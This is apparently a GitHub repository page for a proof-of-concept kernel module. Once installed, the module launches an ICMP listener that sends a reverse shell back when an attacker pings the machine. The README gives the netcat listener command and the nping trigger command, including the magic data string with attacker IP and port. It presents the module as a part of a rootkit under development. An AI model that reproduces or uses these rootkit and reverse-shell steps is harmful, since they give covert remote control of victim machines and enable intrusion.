Skip to content

maK-/reverse-shell-access-kernel-module

Folders and files

NameName
Last commit message
Last commit date

Latest commit

author
Ciarán McNally
Oct 22, 2019
09df919 · Oct 22, 2019

History

3 Commits
May 1, 2014
May 1, 2014
May 1, 2014
May 1, 2014
Oct 22, 2019
May 1, 2014

Repository files navigation

Kernel module invoked reverse shell

When this kernel module is installed it invokes an icmp listener script, this script sends a reverse shell in response to an attacker ping.

Using nc -l [PORT] and then in a separate window running nping --icmp -c 1 -dest-ip [victim ip] --data-string 'maK_it_$H3LL [attacker ip] [PORT]' we can ping the victim machine and send ourselves back a reverse shell. Make sure to have a netcat listener waiting on the port you specify before pinging.

This demonstrates how a user-land script/app can be invoked from the kernel

This functionality will be added as part of the final rootkit that is being developed as part of this project https://web.archive.org/web/20190119045332/https://r00tkit.me/

About

This is a kernel module invoked reverse shell proof of concept.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published